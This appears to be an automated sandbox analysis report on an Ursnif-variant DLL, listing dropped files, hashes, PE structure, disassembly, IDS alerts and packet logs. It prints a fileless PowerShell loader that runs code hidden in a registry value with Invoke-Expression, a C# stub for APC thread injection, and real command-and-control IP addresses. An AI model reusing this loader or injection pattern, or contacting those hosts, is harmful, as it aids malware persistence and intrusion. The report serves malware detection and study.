              Entropy (8bit):5.20333273927167
              Encrypted:false
              SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fYaUzxs7+AEszIWXp+N23fYY:p37Lvkmb6KHQ9WZE8QY
              MD5:18A8C0617983F7C6A255C16EBFBFA03F
              SHA1:BE39A447947DA0B70EF6179615B909FDA5531AB1
              SHA-256:9589F2B65F8A4B1EB5AB2118C8D597C1EFCFD7D46BBC0A4D71FB14568F4D9D1C
              SHA-512:202635C7B4FED6948B57E8FD5A1B6F4A1F344F41FC775122539BCC7426044203DDB95F78E43B85B8140E5D925C05CBA3BD12B8F3A443C450EBDB72B812D5CABB
              Malicious:false
              Reputation:unknown
              Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\tpt0a0ul.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\tpt0a0ul.0.cs"
              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):3584
              Entropy (8bit):2.6122841762978606
              Encrypted:false
              SSDEEP:24:etGS98OmU0t3lm85nt4tdalqQg6A4S41lI+tkZfAjBq3VUWI+ycuZhNIakSEPNnq:6jXQ3r5eXa1kxJKsF31ulIa3Eq
              MD5:97286B2F7B63EF72C7A3499C675926A4
              SHA1:596B03B70A9D8D9836A9E9016C6FC29E400B9C2C
              SHA-256:2689C35999A287EC6A79C036E9BC3E4BCCB301177439A0E28EE1CD3A992A64F6
              SHA-512:4B0EB62F4F727662A1A7B4DEE3D76D898D8E578D6876E4B45BA2F16F1504DFEC1956E971E5A6FAFB421FE130E5FBFD3C498B6C39458437C2BB368A352426697B
              Malicious:false
              Reputation:unknown
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a...........!.................$... ...@....... ....................................@..................................#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..\.............................................................(....*BSJB............v4.0.30319......l...H...#~......<...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................4.-....................................... .............. ;............ H............ [.....P ......f.........l.....v...........................f. ...f...!.f.%...f.......*.....3.1.....;.......H.......[...........
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
              Category:modified
              Size (bytes):848
              Entropy (8bit):5.309161433570556
              Encrypted:false
              SSDEEP:24:AId3ka6KHQSE8QNKaM5DqBVKVrdFAMBJTH:Akka6AQSE8QNKxDcVKdBJj
              MD5:3B7C745FCB06DAB92F185F316C4D4F8C
              SHA1:FB0758E988C94CBE2D44855EC6277C4D5BCBD93E
              SHA-256:73E945B24291C0F86223CF538E212D0B917925464239B852B5BD563FAA346300
              SHA-512:2361DC1DBDCBF46D4212666D6529B69BB372B9C36951664D959B568F51A0E73A821D366DCAA7174BE13E7399DCCBD43A8865FD45B00B04BD61F6287FB47A13F5
              Malicious:false
              Reputation:unknown
              Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\tpt0a0ul.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\tpt0a0ul.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:UTF-8 Unicode (with BOM) text
              Category:dropped
              Size (bytes):404
              Entropy (8bit):5.019892496194437
              Encrypted:false
              SSDEEP:6:V/DsYLDS81zuJyLHMRSR7a1maLXKqoSRa+rVSSRnA/fQTbIOktwy:V/DTLDfucj3aLXKqj9rV5nA/IT8ORy
              MD5:04CA9F3DD2F71BC69A66232592BD29B7
              SHA1:12724CB97FE30A8B84901648B3653B9AC8FB2F73
              SHA-256:DBC22FFC06EBCB8F7E00BB962CA175EFFBBDF0DEBE7A2E4D288A8735C5C27DB1
              SHA-512:383C82A91A354A95E9887E9731852788F466C461EA58A016532E4B07A3E19A97C525B4B579B86A4681BF3DBACFA6B65C8F11032B904737C287A6A5498E4EEB4E
              Malicious:false
              Reputation:unknown
              Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class mdmvexpd. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr uqmdvtabd,IntPtr kdclqxwfug,IntPtr vtnts);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint cxsij,uint lhaikp,IntPtr xwl);.. }..}.
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
              Category:dropped
              Size (bytes):351
              Entropy (8bit):5.24953594154855
              Encrypted:false
              SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fzX0zxs7+AEszIWXp+N23fzXxn:p37Lvkmb6KHz0WZE89
              MD5:921DA3E9E391C4E51D9B00C93242E112
              SHA1:0492BE02AA73C3074F7D992586E58A4C42A4A7F7
              SHA-256:C57416A1C2DA2D8A34B3471166EE2D9AEFF6A15A1C597A3948F49E07AED199E4
              SHA-512:1DAD5FC0E74B448404EF0F5E84D5A442F7E93839035D99708084354A3EC7D6A0F178A3873431CF50964FDA7FF4FCA448E5048E33FB63F3F434E49D069954D8FC
              Malicious:false
              Reputation:unknown
              Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ugg3o5nf.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ugg3o5nf.0.cs"
              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):3584
              Entropy (8bit):2.6227088507264447
              Encrypted:false
              SSDEEP:24:etGS98OmU0t3lm85nt4tdalqQg6AxIS41lI+tkZfgBYDVUWI+ycuZhNPsakSuhPE:6jXQ3r5eXa1mxJgCR31ul0a3oq
              MD5:5A0894EE2C43BC7C6D64BD8F2C1D338E
              SHA1:2488A63B7FB8C0A75F679D1460AAF47BD70696BE
              SHA-256:2F9C20B59F57CE66825E6993FE7FBD62B0B7FF9476F30233035F3A7A63F772DF
              SHA-512:9B8A49AE43ECF45643C49A2362D8B029FA387494B59541CA637DD86886A8019B79C88A04AFB9FE30313E6C7880A7A83A408080F454EC667C2A945653553B2003
              Malicious:false
              Reputation:unknown
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a...........!.................$... ...@....... ....................................@..................................#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..\.............................................................(....*BSJB............v4.0.30319......l...H...#~......<...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................4.-....................................... .............. ;............ H............ [.....P ......f.........l.....v...........................f. ...f...!.f.%...f.......*.....3.1.....;.......H.......[...........
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
              Category:modified
              Size (bytes):848
              Entropy (8bit):5.318973223926223
              Encrypted:false
              SSDEEP:24:AId3ka6KHzVE84KaM5DqBVKVrdFAMBJTH:Akka6ABE84KxDcVKdBJj
              MD5:5A18C993C7FF50AA27F10C8B0ADE5D05
              SHA1:B5B05B6405F4A87A87DA79956725DF8EACDFC1B4
              SHA-256:0BF337B488EAFDDAE024DB4ABFAEED1D133411463FA5367EDE729B65E69215AC
              SHA-512:033A6D45D8EAFE4F7C0DE1A5BB0107C839A7CF81BE00D4A27714AE1D53146686A61DE2C79D911E2695A4BA46BEEDF24FCBABA459B48B83A511AA10A1362707BF
              Malicious:false
              Reputation:unknown
              Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ugg3o5nf.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ugg3o5nf.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
              Category:dropped
              Size (bytes):1152
              Entropy (8bit):5.529378781796543
              Encrypted:false
              SSDEEP:24:BxSAC1xvBnFx2DOXUWvNtLCHY4XW5HjeTKKjX4CIym1ZJXaHNtLCHY4v:BZCHvhFoOFeY4G5qDYB1ZgteY4v
              MD5:0880C2B69E83763B63FAC27CD40DE7B4
              SHA1:5DB053C3F830A58AEE807E20D631D4B33004D879
              SHA-256:AFC6DC0233C2F1B344CF9EBA1DB4717EA073C8ADE024BB6F126DD04EC63D5142
              SHA-512:8B0D83575AD7FAD2AC12E611BFD11413211BDBE4D5A23B4181D1C963684B2ABD30BBAAC1D80AEF06BC8F243C69D47C91117604F4C2B36AEB93BC5A92F0AADE78
              Malicious:false
              Reputation:unknown
              Preview:.**********************..Windows PowerShell transcript start..Start time: 20220126102826..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 124406 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UtilDiagram))..Process ID: 2924..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220126102826..**********************..PS>new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymu
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
              Category:dropped
              Size (bytes):1152
              Entropy (8bit):5.5297740287848836
              Encrypted:false
              SSDEEP:24:BxSAC1xvBnFx2DOXUWvNtLCHY4XW+HjeTKKjX4CIym1ZJXaHNtLCHY4v:BZCHvhFoOFeY4G+qDYB1ZgteY4v
              MD5:C0AA34F71A7B9399B941D17203D4104F
              SHA1:C20FF7A8FE481FDF01BD50D47B99CFC884F568B6
              SHA-256:2B54331C3F4EF85922D9E264DC1B959576441774C61ED5FA768703CB781AF43B
              SHA-512:86B234D4EE43EAA98147A256E2CB3F23E6BF42EDEAEA10C436D5B1AE198CDEE12FCCD1CA0AB4C11738A1C5FCA4506F9A6003573CB2F6CABE2A499DCF35D4A63B
              Malicious:false
              Reputation:unknown
              Preview:.**********************..Windows PowerShell transcript start..Start time: 20220126102826..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 124406 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UtilDiagram))..Process ID: 5940..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220126102826..**********************..PS>new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymu
              File type:MS-DOS executable, MZ for MS-DOS
              Entropy (8bit):4.5782669711427175
              TrID:
              • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
              • Generic Win/DOS Executable (2004/3) 0.20%
              • DOS Executable Generic (2002/1) 0.20%
              • VXD Driver (31/22) 0.00%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:61f113091fd0c.dll
              File size:1062256
              MD5:687f33ac9cb2e8b3c1e7659422caf253
              SHA1:472513fe01ecbc2f51d70d762c1992a4a24c6c15
              SHA256:d1ca0d9f10382d484d02e90d4d5d987653de42a8c4eb5544e4368e4f1965803c
              SHA512:62a3b416d304dd7ab4a128440b493734215ba8acaf3112d5f08054406e1679f1f2b75286a789e471cf67faa19ada593d18f143b2b8e5233283cb7ce76e93198f
              SSDEEP:12288:JZbmvejxoFNjrmkkHZkkkkkEkk2bkkkmkMcpmmkkkknkkkkk0TKxvsXkCk1jX3k+:JZaGeF7
              File Content Preview:MZ......................................................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................!.....8...................................................0......................................,7..O..
              Icon Hash:74f0e4ecccdce0e4
              Entrypoint:0x10002ed0
              Entrypoint Section:.text
              Digitally signed:true
              Imagebase:0x10000000
              Subsystem:windows gui
              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
              DLL Characteristics:
              Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:2aebc4455d4d4828b36e9df040988a2b
              Signature Valid:false
              Signature Issuer:CN=VeriSign Class 3 Code Signing 2004 CA, OU=Terms of use at https://www.verisign.com/rpa (c)04, OU=VeriSign Trust Network, O="VeriSign, Inc.", C=US
              Signature Validation Error:The digital signature of the object did not verify
              Error Number:-2146869232
              Not Before, Not After
              • 10/30/2007 5:00:00 PM 11/24/2010 3:59:59 PM
              Subject Chain
              • CN=Symantec Corporation, OU=Symantec Research Labs, OU=Digital ID Class 3 - Microsoft Software Validation v2, O=Symantec Corporation, L=Santa Monica, S=California, C=US
              Version:3
              Thumbprint MD5:773A103A1953B292916AAA8D3382140B
              Thumbprint SHA-1:508E846523E1B131438B220694BE91793886508E
              Thumbprint SHA-256:F67DDA8679C10547D47FBC3BD71D98953D4F73FC60C50035E6F366E3DA6395C2
              Serial:758F5EE8263B6694719D8434EB998608
              Instruction
              mov ecx, eax
              push 10012E9Dh
              mov ecx, eax
              mov edx, eax
              mov ecx, eax
              mov ebx, eax
              call dword ptr [1000509Ch]
              mov ecx, eax
              call dword ptr [100050F0h]
              mov ecx, eax
              mov ebx, eax
              push 10001083h
              ret
              push esi
              fld qword ptr [eax]
              push eax
              call 00007F71549CB436h
              jc 00007F71549C5876h
              call 00007F71549CB1F6h
              and esi, 0Fh
              push ebp
              pop ebp
              mov edi, dword ptr [ebp+08h]
              mov dword ptr [ebp+7Ch], ebx
              shr ecx, 02h
              jmp 00007F71549C5875h
              add esp, 14h
              or ecx, FFFFFFFFh
              push 00000000h
              pop ecx
              pop ebx
              push 00000000h
              lea ebp, dword ptr [esp-000002A8h]
              pop edi
              mov ebp, esp
              mov eax, ecx
              mov dword ptr [ebp-80h], C000000Dh
              jmp 00007F71549CC9E8h
              mov dword ptr [ebp-80h], C000000Dh
              call 00007F71549CBD6Ah
              push edi
              jne 00007F71549C5876h
              mov dword ptr [ebp+74h], edi
              mov dword ptr [ebp-74h], esi
              mov eax, dword ptr [esp+0Ch]
              fadd qword ptr [eax]
              adc byte ptr [eax], dl
              jmp dword ptr [1000DD64h+ecx*4]
              pop esi
              mov esi, dword ptr [ebp+08h]
              mov dword ptr [10028B28h], 10014229h
              cmp ecx, 00000100h
              jmp 00007F71549C4D96h
              shl ebx, 10h
              jc 00007F71549C5876h
              shl ebx, 08h
              jmp 00007F71549C4D96h
              push ebp
              mov ebp, esp
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x372c | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6000 | 0x3c | .data
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x102000 | 0x1570 | .rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x112000 | 0x4f0 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x5000 | 0x124 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x3658 | 0x3800 | False | 0.586356026786 | data | 6.75923318812 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x5000 | 0x124 | 0x200 | False | 0.322265625 | data | 2.25596773491 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x6000 | 0x1b868 | 0xd800 | False | 0.810528790509 | data | 6.21770504074 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0x22000 | 0xef704 | 0xef800 | False | 0.0616274138831 | data | 4.07049476262 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x112000 | 0x4f0 | 0x600 | False | 0.720052083333 | data | 5.80292166531 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
DLL | Import
advapi32.dll | MakeSelfRelativeSD, GetSecurityDescriptorSacl, GetSecurityDescriptorOwner, ReportEventA, DeregisterEventSource, GetAclInformation, RegisterEventSourceA, GetSidSubAuthority, GetSidLengthRequired, IsValidSid, SetSecurityDescriptorDacl, GetSecurityDescriptorLength, ImpersonateNamedPipeClient, GetLengthSid, CopySid, GetSecurityDescriptorControl, InitializeSecurityDescriptor, RevertToSelf, AddAce, InitializeSid, GetSecurityDescriptorGroup, MakeAbsoluteSD, GetSecurityDescriptorDacl, InitializeAcl
kernel32.dll | ResumeThread, GetModuleFileNameA, GetProcAddress, ExitProcess, ConnectNamedPipe, lstrcmpiA, HeapReAlloc, VirtualProtectEx, GetVersionExA, FindAtomA, WriteFile, FreeLibrary, CreateNamedPipeA, ResetEvent, GetModuleHandleA, TlsAlloc, CreateEventA, HeapAlloc, TlsGetValue, QueryPerformanceCounter, InterlockedDecrement, WaitNamedPipeA, InitializeCriticalSection, GetFullPathNameA, TlsSetValue, GetLastError, lstrlenA, DeleteCriticalSection, GetTickCount, LeaveCriticalSection, HeapSize, GetCurrentThreadId, CloseHandle, OpenEventA, LoadLibraryExA, GetCurrentProcessId, SetEvent, HeapFree, HeapDestroy, GetProcessHeap, SetNamedPipeHandleState, TlsFree, ReadFile, EnterCriticalSection, WaitForSingleObject, CreateFileA, InterlockedIncrement
Name | Ordinal | Address
DllRegisterServer | 1 | 0x10001e0c
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
01/26/22-10:27:49.438083 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49746 | 80 | 192.168.2.3 | 13.107.42.16
01/26/22-10:27:53.249243 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49749 | 80 | 192.168.2.3 | 13.107.42.16
01/26/22-10:27:53.249243 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49749 | 80 | 192.168.2.3 | 13.107.42.16
01/26/22-10:28:10.396904 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49752 | 80 | 192.168.2.3 | 194.76.226.200
01/26/22-10:28:10.396904 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49752 | 80 | 192.168.2.3 | 194.76.226.200
01/26/22-10:28:10.427335 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49753 | 80 | 192.168.2.3 | 194.76.226.200
01/26/22-10:28:10.427335 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49753 | 80 | 192.168.2.3 | 194.76.226.200
01/26/22-10:28:10.463294 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49754 | 80 | 192.168.2.3 | 194.76.226.200
01/26/22-10:28:10.883430 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49753 | 80 | 192.168.2.3 | 194.76.226.200
01/26/22-10:28:10.883430 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49753 | 80 | 192.168.2.3 | 194.76.226.200
01/26/22-10:28:11.085647 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49752 | 80 | 192.168.2.3 | 194.76.226.200
01/26/22-10:28:11.085647 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49752 | 80 | 192.168.2.3 | 194.76.226.200
01/26/22-10:28:11.148815 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49754 | 80 | 192.168.2.3 | 194.76.226.200
01/26/22-10:28:11.148815 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49754 | 80 | 192.168.2.3 | 194.76.226.200
01/26/22-10:28:11.422935 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49753 | 80 | 192.168.2.3 | 194.76.226.200
01/26/22-10:28:11.422935 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49753 | 80 | 192.168.2.3 | 194.76.226.200
01/26/22-10:28:11.783045 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49752 | 80 | 192.168.2.3 | 194.76.226.200
01/26/22-10:28:11.894969 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49754 | 80 | 192.168.2.3 | 194.76.226.200
01/26/22-10:28:11.894969 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49754 | 80 | 192.168.2.3 | 194.76.226.200
01/26/22-10:28:13.619188 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49755 | 80 | 192.168.2.3 | 194.76.226.200
01/26/22-10:28:14.677802 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49755 | 80 | 192.168.2.3 | 194.76.226.200
01/26/22-10:28:14.677802 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49755 | 80 | 192.168.2.3 | 194.76.226.200
01/26/22-10:28:16.546866 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49755 | 80 | 192.168.2.3 | 194.76.226.200
01/26/22-10:28:16.546866 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49755 | 80 | 192.168.2.3 | 194.76.226.200
              Jan 26, 2022 10:28:10.718270063 CET8049752194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:10.720335007 CET4975280192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:10.725728035 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:10.725753069 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:10.725766897 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:10.725783110 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:10.725797892 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:10.725810051 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:10.725845098 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:10.725883007 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:10.725888014 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:10.725894928 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:10.725910902 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:10.725924969 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:10.725928068 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:10.725931883 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:10.725939989 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:10.725975037 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:10.726011038 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:10.726077080 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:10.726089001 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:10.726104975 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:10.726128101 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:10.726146936 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:10.726159096 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:10.726191998 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:10.726217985 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:10.726236105 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:10.726247072 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:10.726279974 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:10.726332903 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:10.726350069 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:10.726361036 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:10.726396084 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:10.726460934 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:10.726500034 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:10.726511002 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:10.726526022 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:10.726548910 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:10.726584911 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:10.726596117 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:10.726639986 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:10.738502026 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:10.738564968 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:10.738600016 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:10.738637924 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:10.738672972 CET4975480192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:10.738676071 CET8049754194.76.226.200192.168.2.3
